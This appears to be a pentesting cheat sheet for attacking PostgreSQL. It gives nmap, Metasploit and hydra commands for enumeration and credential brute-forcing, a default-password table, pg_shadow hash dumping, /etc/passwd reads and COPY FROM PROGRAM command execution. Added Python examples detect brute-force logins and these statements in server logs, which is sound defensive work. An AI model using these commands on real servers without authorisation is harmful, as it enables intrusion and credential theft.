# 5432 - PostgreSQL

PostgreSQL is an open-source database found mostly on Linux systems, although it is compatible with multiple operating systems and also runs on Windows and macOS. If the database is not properly configured and credentials have been obtained, it is possible to perform various activities such as reading and writing system files and executing arbitrary code.

## Enumeration

### Nmap

**Version disclosure**

`nmap -sV -p 5432 10.0.0.1`

**Bruteforce credentials:**

`nmap -p 5432 --script pgsql-brute`

### Metasploit

**Version disclosure**

`auxiliary/scanner/postgres/postgres_version`

**Bruteforce login:**

`auxiliary/scanner/postgres/postgres_login`

**Dump schema:**

`auxiliary/scanner/postgres/postgres_schemadump`

**Database enumeration:**

`auxiliary/admin/postgres/postgres_sql`

**Hashdump:**

`auxiliary/scanner/postgres/postgres_hashdump`

**Read files:**

`auxiliary/admin/postgres/postgres_readfile`

**Reverse shell**

`exploit/linux/postgres/postgres_payload`

## Login

Login using psql:

`psql -h 192.168.100.11 -U postgres`

## Common/default credentials

| Username | Password |
| -------- | -------- |
| postgres | postgres |
| postgres | password |
| postgres | admin    |
| admin    | admin    |
| admin    | password |

### Bruteforce login credentials:

```
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.120 postgres
```
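
To spot this kind of credential guessing from the server side, the following added example (not part of the original page) counts failed password logins per client in the PostgreSQL log. It assumes `log_line_prefix = '%m [%p] %h %u@%d '`; the log lines and the names `find_bruteforce` and `AUTH_LOG` are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumes log_line_prefix = '%m [%p] %h %u@%d ' (time, pid, client host, user@db).
FAILED = re.compile(
    r'^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\.\d+ \S+ \[\d+\] (?P<host>\S+) '
    r'(?P<user>[^@\s]+)@\S+ FATAL:\s+password authentication failed')

# Constructed sample log: one client guessing passwords, one user who mistyped twice.
AUTH_LOG = """\
2024-05-01 10:00:00.101 UTC [4101] 192.168.1.50 postgres@postgres FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:01.220 UTC [4102] 192.168.1.50 postgres@postgres FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:02.310 UTC [4103] 192.168.1.50 postgres@postgres FATAL:  password authentication failed for user "postgres"
2024-05-01 10:00:03.480 UTC [4104] 192.168.1.50 admin@postgres FATAL:  password authentication failed for user "admin"
2024-05-01 10:00:04.555 UTC [4105] 192.168.1.50 admin@postgres FATAL:  password authentication failed for user "admin"
2024-05-01 10:02:10.000 UTC [4110] 10.0.0.7 alice@appdb FATAL:  password authentication failed for user "alice"
2024-05-01 10:14:30.000 UTC [4150] 10.0.0.7 alice@appdb FATAL:  password authentication failed for user "alice"
2024-05-01 10:14:41.000 UTC [4151] 10.0.0.7 alice@appdb LOG:  connection authorized: user=alice database=appdb
""".splitlines()


def find_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {client host: every user name it tried} for hosts with at least
    `threshold` failed logins inside any sliding `window`."""
    failures = defaultdict(list)
    for line in lines:
        m = FAILED.match(line)
        if m:
            ts = datetime.strptime(m['ts'], '%Y-%m-%d %H:%M:%S')
            failures[m['host']].append((ts, m['user']))
    flagged = {}
    for host, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Shrink the window from the left until it spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[host] = sorted({user for _, user in events})
                break
    return flagged


if __name__ == '__main__':
    for host, users in find_bruteforce(AUTH_LOG).items():
        print(f'{host}: repeated failed logins for {", ".join(users)}')
```
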

## Commands

| Description                         | Command |
| ----------------------------------- | ------- |
| List databases                      | `\l` |
| List database users                 | `\du` |
| List existing tables                | `\dt` |
| Connect to a specific database      | `\c database_name;` |
| Get detailed information on a table | `\d+ table_name` |
| Get table content                   | `select * from table_name;` |
| Retrieving database passwords       | `SELECT * FROM users;`<br>OR<br>`select usename, passwd from pg_shadow;` |
| Dumping databases content           | `SELECT usename, passwd FROM pg_shadow;`<br>OR<br>`pg_dump --host=192.168.100.11 --username=postgres --password --dbname=template1 --table='users' -f output_pgdump` |
| Create a new database               | `CREATE DATABASE db_name;` |
| Exit the database                   | `\q` |

## Command execution

PostgreSQL databases can interact with the underlying operating system, allowing the database administrator to execute various database commands and retrieve output from the system.

Run:

`postgres=# select pg_ls_dir('./');`

By executing the following command it is possible to read server-side postgres files.

`postgres=# select pg_read_file('PG_VERSION', 0, 200);`

It is also possible to create a database table in order to store and view the contents of a file that exists on the host.

```
postgres=# CREATE TABLE temp(t TEXT);
postgres=# COPY temp FROM '/etc/passwd';
postgres=# SELECT * FROM temp;
```

Or use the Metasploit module:

`auxiliary/admin/postgres/postgres_readfile`

### Execute command

```
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'sudo -l';
SELECT * FROM cmd_exec;
```
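
The file-read and `COPY ... FROM PROGRAM` statements above leave a clear trace when statement logging is on. This added example (not from the original page) scans log lines for them; it assumes `log_statement = 'all'`, and the sample log and the names `RULES`, `classify` and `scan` are constructed for illustration.

```python
import re

# One rule per technique shown on this page. Order matters: PROGRAM is checked
# before the plain server-side file form of COPY.
RULES = [
    ("copy-program", re.compile(r"\bCOPY\b.+?\b(?:FROM|TO)\s+PROGRAM\b", re.I)),
    ("copy-server-file", re.compile(r"\bCOPY\b.+?\b(?:FROM|TO)\s+E?'", re.I)),
    ("server-file-function",
     re.compile(r"\bpg_(?:read_file|read_binary_file|ls_dir|stat_file)\s*\(", re.I)),
]
# Statement lines as written by the server when log_statement = 'all' (assumed).
STATEMENT = re.compile(r"LOG:\s+statement:\s+(?P<sql>.*)$")

# Constructed sample log. Line 6 is what psql's client-side \copy sends
# (COPY ... FROM STDIN); it touches no server file and must not be flagged.
STATEMENT_LOG = """\
2024-05-01 10:05:00.001 UTC [4200] LOG:  statement: select pg_ls_dir('./');
2024-05-01 10:05:03.112 UTC [4200] LOG:  statement: select pg_read_file('PG_VERSION', 0, 200);
2024-05-01 10:05:10.250 UTC [4200] LOG:  statement: CREATE TABLE temp(t TEXT);
2024-05-01 10:05:12.480 UTC [4200] LOG:  statement: COPY temp FROM '/etc/passwd';
2024-05-01 10:05:20.733 UTC [4200] LOG:  statement: COPY cmd_exec FROM PROGRAM 'sudo -l';
2024-05-01 10:06:02.010 UTC [4311] LOG:  statement: COPY temp FROM STDIN;
2024-05-01 10:06:05.900 UTC [4311] LOG:  statement: SELECT * FROM temp;
""".splitlines()


def classify(sql):
    """Return the name of the first rule the statement matches, or None."""
    for name, pattern in RULES:
        if pattern.search(sql):
            return name
    return None


def scan(lines):
    """Return (line number, rule name, statement) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = STATEMENT.search(line)
        if m and (rule := classify(m["sql"])):
            hits.append((number, rule, m["sql"]))
    return hits


if __name__ == "__main__":
    for number, rule, sql in scan(STATEMENT_LOG):
        print(f"line {number}: {rule}: {sql}")
```

These statements only succeed for a superuser or a role granted `pg_read_server_files`, `pg_write_server_files` or `pg_execute_server_program`, so keeping application roles out of those groups removes the primitive the rules look for.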


